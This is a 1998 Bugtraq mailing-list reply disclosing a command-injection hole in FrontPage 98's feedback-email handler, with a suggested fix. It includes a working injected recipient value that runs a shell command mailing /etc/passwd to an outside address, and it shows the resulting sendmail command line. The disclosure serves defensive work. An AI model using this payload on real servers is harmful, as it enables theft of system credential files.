Re: Followup to FP98 and other Frontpage bugs
From: maex-lists-bugtraq () SPACE NET (Markus Stumpf)
Date: Wed, 14 Oct 1998 02:21:34 +0200
On Mon, Oct 12, 1998 at 11:22:38AM -0700, pedward () WEBCOM COM wrote:
> So, here is the status of Frontpage and its (in)security.
Don't know whether this has already been reported.
I've noticed another weakness which is still present at least in
FP98 with the version id:
When installing a server for Frontpage it creates a file (usually)
In order to get the feedback bot working for sending feedback via eMail
you can define within this file
The "%r" above is substituted with the recipient's email address(es).
With this setting you are vulnerable, as creating a feedback page
with a recipient address of e.g.
`/usr/bin/Mail -s 'password' nobody () example com < /etc/passwd`
will execute the command
/usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobody () example com < /etc/passwd`
and send the password file to nobody () example com
To avoid this tell Frontpage to use the SMTP protocol to send emails
and you may probably also use
MailSender:webmaster () example com
SpaceNet GmbH | http://www.Space.Net/ | In a world without
Research & Development | mailto:research () Space Net | walls and fences,
Frankfurter Ring 193a | Tel: +49 (89) 32356-0 | who needs
D-80807 Muenchen | Fax: +49 (89) 32356-299 | Windows and Gates?